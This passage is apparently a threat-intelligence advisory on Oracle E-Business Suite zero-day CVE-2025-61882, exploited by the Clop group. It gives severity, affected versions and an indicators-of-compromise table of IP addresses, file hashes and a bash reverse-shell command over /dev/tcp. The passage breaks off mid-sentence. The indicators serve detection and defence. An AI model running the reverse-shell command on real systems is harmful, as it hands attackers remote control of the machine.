Oracle has released an advisory about a critical E-Business Suite zero-day vulnerability CVE-2025-61882 that allows attackers to perform unauthenticated remote code execution, with the flaw actively exploited in Clop data theft attacks.
CVE-2025-61882 is a critical zero-day vulnerability in Oracle E-Business Suite, allowing unauthenticated remote code execution, which has been actively exploited by the Clop ransomware group It has a high CVSS score of 9.8, indicating an urgent security risk due to its potential for exploitation over the network without requiring any authentication.
CVSSv3 score: 9.8 (Critical)
Score as per Recorded Future: 99
Affected Product: Oracle E-Business Suite (EBS)
Component: Concurrent Processing – BI Publisher Integration
Attack Vector: Remote, unauthenticated (no username/password required)
First Reported: Oct 5, 2025
Affected Products and Versions: Oracle E-Business Suite, versions 12.2.3-12.2.14
| Indicator | Type | Description |
| 200[.]107[.]207.26 | IP | Potential GET and POST activity |
| 185[.]181[.]60.11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
The exploitation of CVE-2025-61882 can result in